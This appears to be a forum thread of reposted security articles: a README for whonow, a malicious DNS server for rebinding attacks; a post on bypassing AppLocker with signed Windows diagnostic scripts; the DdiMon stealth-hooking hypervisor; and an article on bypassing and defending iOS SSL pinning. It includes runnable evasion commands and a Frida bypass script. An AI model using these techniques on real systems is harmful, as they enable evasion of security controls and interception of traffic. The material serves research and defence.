zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation. (from the DNS Wikipedia page) Additionally, there may not be more than 127 labels/subdomains. Gotchas Use Unique Domain Names Each unique domain name request to whonow creates a small state-saving program in the server's RAM. The next time that domain name is requested the program counter increments and the state may be mutated. All unique domain names are their own unique program instances. To avoid clashing with other users or having your domain name program's state inadvertently incremented you should add a UUID subdomain after your rule definitions. That UUID should never be reused. # this A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network # not this A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network --max-ram-domains The program state associated with each unique domain name is stored by whonow in RAM. To avoid running out of RAM an upper-bound is placed on the number of unique domains who's program state can be managed at the same time. By default, this value is set to 10,000,000, but can be configured with the --max-ram-domains. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO). Running your own whonow server To run your own whonow server in the cloud use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install whonow on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet. # install npm install --cli -g whonow@latest # run it! whonow --port 53 If that ☝ is too much trouble, feel free to just use the public whonow server running on rebind.network 🌐. Usage $ whonow --help usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS] A malicious DNS server for executing DNS Rebinding attacks on the fly. Optional arguments: -h, --help Show this help message and exit. -v, --version Show program's version number and exit. -p PORT, --port PORT What port to run the DNS server on (default: 53). -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER The default IP address to respond with if no rule is found (default: "127.0.0.1"). -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS The number of domain name records to store in RAM at once. Once the number of unique domain names queried surpasses this number domains will be removed from memory in the order they were requested. Domains that have been removed in this way will have their program state reset the next time they are queried (default: 10000000). Testing A whonow server must be running on localhost:15353 to perform the tests in test.js # in one terminal whonow -p 15353 # in another terminal cd path/to/node_modules/whonow npm test Sursa: https://github.com/brannondorsey/whonow
-
- 1
-
-
Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts JANUARY 7, 2018 ~ BOHOPS Introduction Last week, I was hunting around the Windows Operating System for interesting scripts and binaries that may be useful for future penetration tests and Red Team engagements. With increased client-side security, awareness, and monitoring (e.g. AppLocker, Device Guard, AMSI, Powershell ScriptBlock Logging, PowerShell Constraint Language Mode, User Mode Code Integrity, HIDS/anti-virus, the SOC, etc.), looking for ways to deceive, evade, and/or bypass security solutions have become a significant component of the ethical hacker’s playbook. While hunting, I came across an interesting directory structure that contained diagnostic scripts located at the following ‘parent’ path: %systemroot%\diagnostics\system\ In particular, two subdirectories (\AERO) and (\Audio) contained two very interesting, signed PowerShell Scripts: CL_Invocation.ps1 CL_LoadAssembly.ps1 CL_Invocation.ps1 provides a function (SyncInvoke) to execute binaries through System.Diagnostics.Process. and CL_LoadAssembly.ps1 provides two functions (LoadAssemblyFromNS and LoadAssemblyFromPath) for loading .NET/C# assemblies (DLLs/EXEs). Analysis of CL_Invocation.ps1 While investigating this script, it was quite apparent that executing commands would be very easy, as demonstrated in the following screenshot: Importing the module and using SyncInvoke is pretty straight forward, and command execution is successfully achieved through: . CL_Invocation.ps1 (or import-module CL_Invocation.ps1) SyncInvoke <command> <arg...> However, further research indicated that this technique did not bypass any protections with subsequent testing efforts. PowerShell Contrained Language Mode (in PSv5) prevented the execution of certain PowerShell code/scripts and Default AppLocker policies prevented the execution of unsigned binaries under the context of an unprivileged account. Still, CL_Invocation.ps1 may have merit within trusted execution chains and evading defender analysis when combined with other techniques. **Big thanks to @Oddvarmoe and @xenosCR for their help and analysis of CL_Invocation Analysis of CL_LoadAssembly.ps1 While investigating CL_LoadAssembly, I found a very interesting write-up (Applocker Bypass-Assembly Load) by @netbiosX that describes research conducted by Casey Smith (@subTee) during a presentation at SchmooCon 2015. He successfully discovered an AppLocker bypass through the use of loading assemblies within PowerShell by URL, file location, and byte code. Additionally, @subTee alluded to a bypass technique with CL_LoadAssembly in a Tweet posted a few years ago: In order to test this method, I compiled a very basic program (assembly) in C# (Target Framework: .NET 2.0) that I called funrun.exe, which runs calc.exe via proc.start() if (successfully) executed: Using a Windows 2016 machine with Default AppLocker rules under an unprivileged user context, the user attempted to execute funrun.exe directly. When called on the cmd line and PowerShell (v5), this was prevented by policy as shown in the following screenshot: Funrun.exe was also prevented by policy when ran under PowerShell version 2: Using CL_LoadAssembly, the user successfully loads the assembly with a path traversal call to funrun.exe. However, Constrained Language mode prevented the user from calling the method in PowerShell (v5) as indicated in the following screenshot: To bypass Constrained Language mode, the user invokes PowerShell v2 and successfully loads the assembly with a path traversal call to funrun.exe: The user calls the funrun assembly method and spawns calc.exe: Success! As an unprivileged user, we proved that we could bypass Constrained Language mode by invoking PowerShell version 2 (Note: this must be enabled) and bypassed AppLocker by loading an assembly through CL_LoadAssembly.ps1. For completeness, here is the CL sequence: powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\temp\funrun.exe [funrun.hashtag]::winning() AppLocker Bypass Resources For more information about AppLocker bypass techniques, I highly recommend checking out The Ultimate AppLocker Bypass List created and maintained by Oddvar Moe (@Oddvarmoe). Also, these resources were very helpful while drafting this post: AppLocker Bypass-Assembly Load – https://pentestlab.blog/tag/assembly-load/ C# to Windows Meterpreter in 10 min – https://holdmybeersecurity.com/2016/09/11/c-to-windows-meterpreter-in-10mins/ Conclusion Well folks, that covers interesting code execution and AppLocker bypass vectors to incorporate into your red team/pen test engagements. Please feel free to contact me or leave a message if you have any other questions/comments. Thank you for reading! Sursa: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
-
- 1
-
-
Pentester Academy TV Publicat pe 28 mar. 2018 ABONEAZĂ-TE 21 K Today's episode of The Tool Box features NetRipper. We breakdown everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out NetRipper here: Github - https://github.com/NytroRST/NetRipper Send your tool to: media@pentesteracademy.com for consideration Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn
-
- 4
-
-
-
DdiMon Introduction DdiMon is a hypervisor performing inline hooking that is invisible to a guest (ie, any code other than DdiMon) by using extended page table (EPT). DdiMon is meant to be an educational tool for understanding how to use EPT from a programming perspective for research. To demonstrate it, DdiMon installs the invisible inline hooks on the following device driver interfaces (DDIs) to monitor activities of the Windows built-in kernel patch protection, a.k.a. PatchGuard, and hide certain processes without being detected by PatchGuard. ExQueueWorkItem ExAllocatePoolWithTag ExFreePool ExFreePoolWithTag NtQuerySystemInformation Those stealth shadow hooks are hidden from guest's read and write memory operations and exposed only on execution of the memory. Therefore, they are neither visible nor overwritable from a guest, while they function as ordinal hooks. It is accomplished by making use of EPT enforcing a guest to see different memory contents from what it would see if EPT is not in use. This technique is often called memory shadowing. For more details, see the Design section below. Here is a movie demonstrating that shadow hooks allow you to monitor and control DDI calls without being notified by PatchGuard. https://www.youtube.com/watch?v=UflyX3GeYkw DdiMon is implemented on the top of HyperPlatform. See a project page for more details of HyperPlatform: https://github.com/tandasat/HyperPlatform Installation and Uninstallation Clone full source code from Github with a below command and compile it on Visual Studio. $ git clone --recursive https://github.com/tandasat/DdiMon.git On the x64 platform, you have to enable test signing to install the driver. To do that, open the command prompt with the administrator privilege and type the following command, and then restart the system to activate the change: >bcdedit /set testsigning on To install and uninstall the driver, use the 'sc' command. For installation: >sc create DdiMon type= kernel binPath= C:\Users\user\Desktop\DdiMon.sys >sc start DdiMon And for uninstallation: >sc stop DdiMon >sc delete DdiMon >bcdedit /deletevalue testsigning Note that the system must support the Intel VT-x and EPT technology to successfully install the driver. To install the driver on a virtual machine on VMware Workstation, see an "Using VMware Workstation" section in the HyperPlatform User Document. http://tandasat.github.io/HyperPlatform/userdocument/ Output All logs are printed out to DbgView and saved in C:\Windows\DdiMon.log. Motivation Despite existence of plenty of academic research projects[1,2,3] and production software[4,5], EPT (a.k.a. SLAT; second-level-address translation) is still underused technology among reverse engineers due to lack of information on how it works and how to control it through programming. MoRE[6] by Jacob Torrey is a one of very few open source projects demonstrating use of EPT with small amount of code. While we recommend to look into the project for basic comprehension of how EPT can be initialized and used to set up more than 1:1 guest to machine physical memory mapping, MoRE lacks flexibility to extend its code for supporting broader platforms and implementing your own analysis tools. DdiMon provides a similar sample use of EPT as what MoRE does with a greater range of platform support such as x64 and/or Windows 10. DdiMon, also, can be seen as example extension of HyperPlatform for memory virtualization. [1] SecVisor: A Tiny Hypervisor to Provide Lifetime Kernel Code Integrity for Commodity OSes - https://www.cs.cmu.edu/~arvinds/pubs/secvisor.pdf [2] SPIDER: Stealthy Binary Program Instrumentation and Debugging via Hardware Virtualization - https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2013-5.pdf [3] Dynamic VM Dependability Monitoring Using Hypervisor Probes - http://assured-cloud-computing.illinois.edu/files/2014/03/Dynamic-VM-Dependability-Monitoring-Using-Hypervisor-Probes.pdf [4] Windows 10 Virtualization-based Security (Device Guard) - https://technet.microsoft.com/en-us/library/mt463091(v=vs.85).aspx [5] VMRay - https://www.vmray.com/features/ [6] MoRE - https://github.com/ainfosec/MoRE Design In order to install a shadow hook, DdiMon creates a couple of copies of a page where the address to install a hook belongs to. After DdiMon is initialized, those two pages are accessed when a guest, namely all but ones by the hypervisor (ie, DdiMon), attempts to access to the original page instead. For example, when DdiMon installs a hook onto 0x1234, two copied pages are created: 0xa000 for execution access and 0xb000 for read or write access, and memory access is performed as below after the hook is activated: Requested Accessed By Hypervisor: 0x1234 -> 0x1234 on all access By Guest: 0x1234 -> 0xa234 on execution access -> 0xb234 on read or write access The following explains how it is accomplished. Default state DdiMon first configures an EPT entry corresponds to 0x1000-0x1fff to refer to the contents of 0xa000 and to disallow read and write access to the page. Scenario: Read or Write With this configuration, any read and write access triggers EPT violation VM-exit. Up on the VM-exit, the EPT entry for 0x1000-0x1fff is modified to refer to the contents of 0xb000, which is copy of 0x1000, and to allow read and write to the page. And then, sets the Monitor Trap Flag (MTF), which works like the Trap Flag of the flag register but not visible to a guest, so that a guest can perform the read or write operation and then interrupted by the hypervisor with MTF VM-exit. After executing a single instruction, a guest is interrupted by MTF VM-exit. On this VM-exit, the hypervisor clears the MTF and resets the EPT entry to the default state so that subsequent execution is done with the contents of 0xa000. As a result of this sequence of operations, a guest executed a single instruction reading from or writing to 0xb234. Scenario: Execute At this time, execution is done against contents of 0xa000 without triggering any events unless no other settings is made. In order to monitor execution of 0xa234 (0x1234 from guest's perspective), DdiMon sets a break point (0xcc) to 0xa234 and handles #BP in the hypervisor. Following steps are how DdiMon hooks execution of 0xa234. On #BP VM-exit, the hypervisor checks if guest's EIP/RIP is 0x1234 first. If so, the hypervisor changes the contents of the register to point to a corresponding hook handler for instrumenting the DDI call. On VM-enter, a guest executes the hook handler. The hook handler calls an original function, examines parameters, return values and/or a return address, and takes action accordingly. This is just like a typical inline hooking. Only differences are that it sets 0xcc and changes EIP/RIP from a hypervisor instead of overwriting original code with JMP instructions and that installed hooks are not visible from a guest. An advantage of using 0xcc is that it does not require a target function to have a length to install JMP instructions. Implementation The following are a call hierarchy with regard to sequences explained above. On DriverEntry DdimonInitialization() DdimonpEnumExportedSymbolsCallback() // Enumerates exports of ntoskrnl ShInstallHook() // Installs a stealth hook ShEnableHooks() // Activates installed hooks ShEnablePageShadowing() ShpEnablePageShadowingForExec() // Configures an EPT entry as // explained in "Default state" On EPT violation VM-exit with read or write VmmpHandleEptViolation() EptHandleEptViolation() ShHandleEptViolation() // Performs actions as explained in the 1 of // "Scenario: Read or Write" On MTF VM-exit VmmpHandleMonitorTrap() ShHandleMonitorTrapFlag() // Performs actions as explained in the 2 of // "Scenario: Read or Write" On #BP VM-exit VmmpHandleException() ShHandleBreakpoint() // Performs actions as explained in the 1 of // "Scenario: Execute" Implemented Hook Handlers ExQueueWorkItem - The hook handler prints out given parameters when a specified work item routine is not inside any images. ExAllocatePoolWithTag - The hook handler prints out given parameters and a return value of ExAllocatePoolWithTag() when it is called from an address where is not backed by any images. ExFreePool and ExFreePoolWithTag - The hook handlers print out given parameters when they are called from addresses where are not backed by any images. NtQuerySystemInformation - The hook handler takes out an entry for "cmd.exe" from returned process information so that cmd.exe is not listed by process enumeration. The easiest way to see those logs is installing NoImage.sys. https://github.com/tandasat/MemoryMon/tree/master/MemoryMonTest Logs for activities of NoImage are look like this: 17:59:23.014 INF #0 4 48 System 84660265: ExFreePoolWithTag(P= 84665000, Tag= nigm) 17:59:23.014 INF #0 4 48 System 84660283: ExAllocatePoolWithTag(POOL_TYPE= 00000000, NumberOfBytes= 00001000, Tag= nigm) => 8517B000 17:59:23.014 INF #0 4 48 System 8517B1C3: ExQueueWorkItem({Routine= 8517B1D4, Parameter= 8517B000}, 1) Caveats DdiMon is meant to be an educational tool and not robust, production quality software which is able to handle various edge cases. For example, DdiMon does not handle self-modification code since any memory writes on a shadowed page is not reflected to a view for execution. For this reason, researchers are encouraged to use this project as sample code to get familiar with EPT and develop their own tools as needed. Supported Platforms x86 and x64 Windows 7, 8.1 and 10 The system must support the Intel VT-x and EPT technology License This software is released under the MIT License, see LICENSE. Sursa: https://github.com/tandasat/DdiMon
-
Prevent bypassing of SSL certificate pinning in iOS applications TECHNOLOGY iOS By: Dennis Frett - Software engineer One of the first things an attacker will do when reverse engineering a mobile application is to bypass the SSL/TLS (Secure Sockets Layer/Transport Layer Security) protection to gain a better insight in the application’s functioning and the way it communicates with its server. In this blog, we explain which techniques are used to bypass SSL pinning in iOS and which countermeasures can be taken. What is SSL pinning? When mobile apps communicate with a server, they typically use SSL to protect the transmitted data against eavesdropping and tampering. By default, SSL implementations used in apps trust any server with certificate trusted by the operating system’s trust store. This store is a list of certificate authorities that is shipped with the operating system. With SSL pinning, however, the application is configured to reject all but one or a few predefined certificates. Whenever the application connects to a server, it compares the server certificate with the pinned certificate(s). If and only if they match, the server is trusted and the SSL connection is established. Why do we need SSL pinning? Setting up and maintaining SSL sessions is usually delegated to a system library. This means that the application that tries to establish a connection does not determine which certificates to trust and which not. The application relies entirely on the certificates that are included in the operating system’s trust store. A researcher who generates a self-signed certificate and includes it in the operating system's trust store can set up a man-in-the-middle attack against any app that uses SSL. This would allow him to read and manipulate every single SSL session. The attacker could use this ability to reverse engineer the protocol the app uses or to extract API keys from the requests. Attackers can also compromise SSL sessions by tricking the user into installing a trusted CA through a malicious web page. Or the root CAs trusted by the device can get compromised and be used to generate certificates. Narrowing the set of trusted certificates through the implementation of SSL pinning effectively protects applications from the described remote attacks. It also prevents reverse engineers from adding a custom root CA to the store of their own device to analyze the functionality of the application and the way it communicates with the server. SSL pinning implementation in iOS SSL pinning is implemented by storing additional information inside the app to identify the server and ensure that no man-in-the-middle attack is being carried out. What to pin? Either the actual server certificate itself or the public key of the server is pinned. You can opt to store the exact data or a hash of that data. This can be a file hash of the certificate file or a hash of the public key string. The choice between pinning the certificate or the public key has a few implications for security and maintenance of the application. This lies outside the scope of this blog, but more information can be found here. Embedding pinned data The data required for SSL pinning can be embedded in the application in two ways: in an asset file or as a string in the actual code of the app. If you pin the certificate file, the certificate is usually embedded as an asset file. Each time an SSL connection is made, the received server certificate is compared to the known certificate(s) file(s). Only if the files match exactly, the connection is trusted. When pinning the public key of the server, the key can be embedded as a string in the application code or it can be stored in an asset file. Whenever an SSL connection is made, the public key is extracted from the received server certificate and compared to the stored string. If the strings match exactly, the connection is trusted. Popular Options The following libraries are popular options for implementing SSL pinning in Swift and Objective-C iOS applications. Name Pinning implementation Language Type Link NSURLSession Certificate file, public key Objective-C Apple networking library Link AlamoFire Certificate file, public key Swift Networking library Link AFNetworking Certificate file, public key Objective-C Networking library Link TrustKit Public key Objective-C SSL pinning Link NSURLSession is Apple’s API for facilitating network communication. It is a low-level framework, so implementing SSL pinning with it is hard and requires a lot of manual checks. TrustKit, AlamoFire and AFNetworking are widely used frameworks built on top of NSURLSession. Both AFNetworking and AlamoFire are full-fledged networking libraries that support SSL pinning checks as part of their API. TrustKit is a small framework that only implements SSL pinning checks. AFNetworking for Objective-C apps or AlamoFire for Swift apps are good choices when you are looking for a complete network library. If you only need SSL pinning, TrustKit is a good option. Bypass SSL pinning protection Bypassing SSL pinning can be achieved in one of two ways: By avoiding the SSL pinning check or discarding the result of the check. By replacing the pinned data in the application, for example the certificate asset or the hashed key. In the next sections, we will demonstrate both methods using a sample application and provide some suggestions on how to prevent tampering attempts. Test setup and goal We will show how to bypass TrustKit SSL pinning in the TrustKit demo application running on a jailbroken iPhone. We will be using the following tools. mitmproxy is used to analyze what data is being sent over the network. Alternative tools would be Burp Suite or Charles. Frida is used for hooking and patching methods. Other popular hooking frameworks are Cydia Substrate, Cycript or Substitute. To replace strings in the binary, we will use the Hopper disassembler. The TrustKit demo application has minimal functionality. It only tries to connect to https://www.yahoo.com/using an invalid pinned hash for that domain. let trustKitConfig: [String: Any] = [ kTSKSwizzleNetworkDelegates: false, kTSKPinnedDomains: [ "yahoo.com": [ kTSKEnforcePinning: true, kTSKIncludeSubdomains: true, kTSKPublicKeyAlgorithms: [kTSKAlgorithmRsa2048], // Invalid pins to demonstrate a pinning failure kTSKPublicKeyHashes: [ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=", "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=" ], kTSKReportUris:["https://overmind.datatheorem.com/trustkit/report"], ], … Note that even if the supplied hashes would be valid for the yahoo.com domain, SSL pinning validation should still fail as long as we’re using a man-in-the-middle proxy. When connecting to yahoo.com, mitmproxy shows us that the domain is not actually visited. Only the report of the SSL pinning verification is sent to the configured servers. The device itself displays a message that the pinning validation failed. All of this is expected behavior since SSL pinning is enabled. Avoiding the SSL pinning check We will explain how to bypass the SSL pinning check with Frida. Before we can try to bypass it, we need to find out where in the code the actual SSL pinning check is performed. Finding the check Since TrustKit is open source, we can easily find out where the actual certificate validation logic takes place: -[TSKPinningValidator evaluateTrust:forHostname:]. In cases in which the source code is not available, a good look at the API of the SSL pinning library will usually reveal where the actual validation work is done. The signature of evaluateTrust:forHostname: contains a lot of information about the method. - (TSKTrustDecision)evaluateTrust:(SecTrustRef _Nonnull)serverTrust forHostname:(NSString * _Nonnull)serverHostname The method is passed 2 arguments, including the hostname of the server that is being contacted, and it returns a TSKTrustDecision. The TSKTrustDecision type is a simple enum. /** Possible return values when verifying a server's identity against a set of pins. */ typedef NS_ENUM(NSInteger, TSKTrustEvaluationResult) { TSKTrustEvaluationSuccess, TSKTrustEvaluationFailedNoMatchingPin, TSKTrustEvaluationFailedInvalidCertificateChain, TSKTrustEvaluationErrorInvalidParameters, TSKTrustEvaluationFailedUserDefinedTrustAnchor, TSKTrustEvaluationErrorCouldNotGenerateSpkiHash, }; The source code documents each of these fields, but it is clear that the most interesting value is TSKTrustEvaluationSuccess. Bypassing the check To bypass the TrustKit SSL pinning check, we will hook the -[TSKPinningValidator evaluateTrust:forHostname:] method using Frida and ensure it always returns the required value. First, we create a Frida instrumentation script and save it as disable_trustkit.js. var evalTrust = ObjC.classes.TSKPinningValidator["- evaluateTrust:forHostname:"]; Interceptor.attach(evalTrust.implementation, { onLeave: function(retval) { console.log("Current return value: " + retval); retval.replace(0); console.log("Return value replaced with (TSKTrustDecision) \ TSKTrustDecisionShouldAllowConnection"); } }); This script will attach Frida to the evaluateTrust:forHostname: instance method in the TSKPinningValidator interface and execute the given code each time this method returns. The code replaces the return value with 0 (TSKTrustEvaluationSuccess) regardless of its previous value and logs this. We launch Frida and attach to the TrustKitDemo process on our device, executing our script: frida -U -l disable_trustkit.js -n TrustKitDemo-Swift. If we try to load https://www.yahoo.com now, we see in mitmproxy suite that the URL was loaded successfully. The device also shows that the pin validation succeeded. Locally, Frida returns the following output showing that the hook did what we expected. [iPhone::TrustKitDemo-Swift]-> Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection We have now successfully bypassed TrustKit SSL pinning and are able to view and modify all web requests. Of course, this is only a very basic example of bypassing a single SSL pinning implementation through changing a return value. Off-the-shelf tools Bypassing SSL can be accomplished even easier using existing tweaks for jailbroken devices. SSL Kill Switch 2, for example, patches the low-level iOS TLS stack, disabling all SSL pinning implementations that use it. The Objection SSL Pinning disabler for Frida implements the low-level checks of SSL Kill Switch 2 and extends these with a few framework-specific hooks. The following table outlines the methods that can be hooked for some SSL pinning frameworks. libcoretls_cfhelpers.dylib tls_helper_create_peer_trust NSURLSession -[* URLSession:didReceiveChallenge:completionHandler:] NSURLConnection -[* connection:willSendRequestForAuthenticationChallenge:] AFNetworking -[AFSecurityPolicy setSSLPinningMode:] -[AFSecurityPolicy setAllowInvalidCertificates:] +[AFSecurityPolicy policyWithPinningMode:] +[AFSecurityPolicy policyWithPinningMode:withPinnedCertificates:] Mitigation: detect hooking Before verifying the SSL pin, we can verify the integrity of the above functions. As an example, we’ll use SSL Kill Switch 2 which is built on top of the ‘Cydia Substrate’ framework, a commonly used library for writing runtime hooks. Hooking in this framework is done through the MSHookFunction API. The method explained here is a proof-of-concept. Don’t use this hook detection code in production software. It is a very basic and only detects a specific kind of hook on ARM64. Using this check without any additional obfuscation would also make it very easy to remove. A common way of hooking native functions is to overwrite their first couple of instructions with a ‘trampoline’, a set of instructions responsible for diverting control flow to a new code fragment to replace or augment the original behavior. Using lldb, we can see exactly what this ‘trampoline’ looks like. First 10 instructions of the unhooked function: (llb) dis -n tls_helper_create_peer_trust libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust: 0x1a8c13514 <+0>: stp x26, x25, [sp, #-0x50]! 0x1a8c13518 <+4>: stp x24, x23, [sp, #0x10] 0x1a8c1351c <+8>: stp x22, x21, [sp, #0x20] 0x1a8c13520 <+12>: stp x20, x19, [sp, #0x30] 0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40] 0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40 0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20 0x1a8c13530 <+28>: mov x19, x2 0x1a8c13534 <+32>: mov x24, x1 0x1a8c13538 <+36>: mov x21, x0 First 10 instructions of the hooked function: (llb) dis -n tls_helper_create_peer_trust libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust: 0x1a8c13514 <+0>: ldr x16, #0x8 ; <+8> 0x1a8c13518 <+4>: br x16 0x1a8c1351c <+8>: .long 0x00267c2c ; unknown opcode 0x1a8c13520 <+12>: .long 0x00000001 ; unknown opcode 0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40] 0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40 0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20 0x1a8c13530 <+28>: mov x19, x2 0x1a8c13534 <+32>: mov x24, x1 0x1a8c13538 <+36>: mov x21, x0 In the hooked function, the first 16 bytes form the trampoline. The address 0x00000001002ebc2c is loaded into register x16 after which it jumps to that address (BR X16). This address refers to SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust, which is SSL Kill Switch 2’s replaced implementation (lldb) dis -a 0x00000001002ebc2c SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust: 0x1002ebc2c <+0>: sub sp, sp, #0x20 ; =0x20 0x1002ebc30 <+4>: mov w8, #0x0 0x1002ebc34 <+8>: str x0, [sp, #0x18] 0x1002ebc38 <+12>: strb w1, [sp, #0x17] 0x1002ebc3c <+16>: str x2, [sp, #0x8] 0x1002ebc40 <+20>: mov x0, x8 0x1002ebc44 <+24>: add sp, sp, #0x20 ; =0x20 If a function’s implementation is known in advance, the first few bytes of the found function can be compared to the known bytes, effectively ‘pinning’ the function implementation. For Cydia Substrate, we see the function being patched with an unconditional branch to a register (BR Xn), so we can check if we find such an instruction in the first few bytes. If a branch instruction is found, we assume the function is hooked, otherwise we assume it is valid. For demonstration purposes, this simplified assumption will suffice. To find a good mask to detect branch instructions, we had a look at the opcode tables in the GNU Binutils source code. The aarch64_opcode_table table contains ARM64 opcodes and a mask for the opcode. struct aarch64_opcode aarch64_opcode_table[] = { ... /* Unconditional branch (register). */ {"br", 0xd61f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0}, {"blr", 0xd63f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0}, {"ret", 0xd65f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, F_OPD0_OPT | F_DEFAULT (30)}, ... The entries are aarch64_opcode structs. From the opcode mask (0xfffffc1f) and the instruction representations, we can deduce that the opcode for unconditional branch to register value instructions must match 0xD61F0000. // Only valid for ARM64. int isSSLHooked() { void* (*createTrustFunc)() = dlsym(RTLD_DEFAULT, "tls_helper_create_peer_trust"); if(createTrustFunc == 0x0){ // Unable to find symbol, assume function is hooked. return 1; } unsigned int * createTrustFuncAddr = (unsigned int *) createTrustFunc; // Verify if one of first three instructions is an unconditional branch // to register (BR Xn), unconditional branch with link to register // (BLR Xn), return (RET). for(int i = 0; i < 3; i++){ int opCode = createTrustFuncAddr[i] & 0xfffffc1f; if(opCode == 0xD61F0000){ // Instruction found, function is hooked. return 1; } } // Function is not hooked through a trampoline. return 0; } We can call this function before an SSL pinning check is done, for example in loadUrl, and only start an SSL session if the checked function is not hooked. Mitigation: name obfucation To bypass SSL pinning, the attacker first needs to find out which method he has to hook . By using a tool to obfuscate Swift and Objective-C metadata in their iOS app, developers can make it much more difficult for the attacker to determine which methods to hook. Name obfuscation will also throw off all automated tools that look for a known method name. An obfuscator can rename methods in a different way in each single build of the application, forcing an attacker to search the actual name in each new version. It is important to note that name obfuscation only protects against tools that bypass SSL checks implemented in the code of applications or in libraries included in the application. Tools that work by hooking system frameworks won’t be deterred by it. Replacing SSL pinning data The other way to bypass SSL pinning is to replace the pinned data inside the application. If we are able to replace the original pinned certificate file or public key string with one that belongs to our man-in-the-middle server, we would be pinning our own server. Replacing an embedded certificate file can be as easy as swapping a file in the IPA package. In implementations that pin a hash of the server public key, we can replace the string with the hash of our own public key. The screenshot below shows the TrustKit demo application loaded into Hopper. Hopper allows us to replace strings in the MachO file and reassemble it into a valid executable. Once the file or the string is replaced, the directory needs to be resigned and zipped as an IPA. This lies outside the scope of this blog, but more information can be found here. Mitigation: string encryption When pinning certificates with a list of hard-coded public key hashes, it is a good idea to encrypt the values. This doesn’t protect against hooking, but makes it much more difficult to replace the original hashes with those of an attacker certificate since these would have to be correctly encrypted as well. Mitigation: control flow obfuscation A reverse engineer can analyze the control flow of the application to find the location where the actual hash is verified. If he succeeds in finding it, he can see which strings are used and find out the location of the hash string in the binary. By obfuscating the control flow of the application, the app developer makes it much more difficult to perform a manual analysis of the code. Sursa: https://www.guardsquare.com/en/blog/iOS-SSL-certificate-pinning-bypassing